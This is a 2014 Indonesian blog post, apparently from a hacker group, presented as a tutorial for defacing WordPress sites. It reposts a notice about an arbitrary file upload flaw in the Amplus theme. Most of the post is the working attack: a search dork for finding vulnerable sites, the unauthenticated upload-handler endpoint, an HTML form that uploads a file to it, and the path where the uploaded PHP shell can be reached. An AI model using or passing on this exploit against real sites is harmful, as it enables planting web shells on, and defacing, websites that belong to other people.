Blog ini hanyalah ungkapan akan ketidaksempurnaan seseorang yang haus terhadap ilmu pengetahuan. Hanya blog biasa dan sederhana tanpa
ada sesuatu apapun itu yang membuatnya spesial. Merupakan titik temu antara pola pikir dan rasa penasaran yang kemudian tertumpah
dalam barisan abjad atau angka yang kadang penulispun terjerumus di dalamnya. fvck real dejavu //p4r46hcyb3rn3t
[+] Post Title :

Tutor Deface Wordpress CSRF Umplus Vulnerability


[+] Date : Sabtu, 19 April 2014
[+] Author : SixZero
[+] Link : http://b-h-t.blogspot.com/2014/04/tutor-deface-wordpress-csrf-umplus.html
[+] Type :
( Tutorial Simple CSRF Umplus )

#Title : Wordpress Amplus Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Tester
    Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:wp-content/themes/amplus


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

0 komentar:

Posting Komentar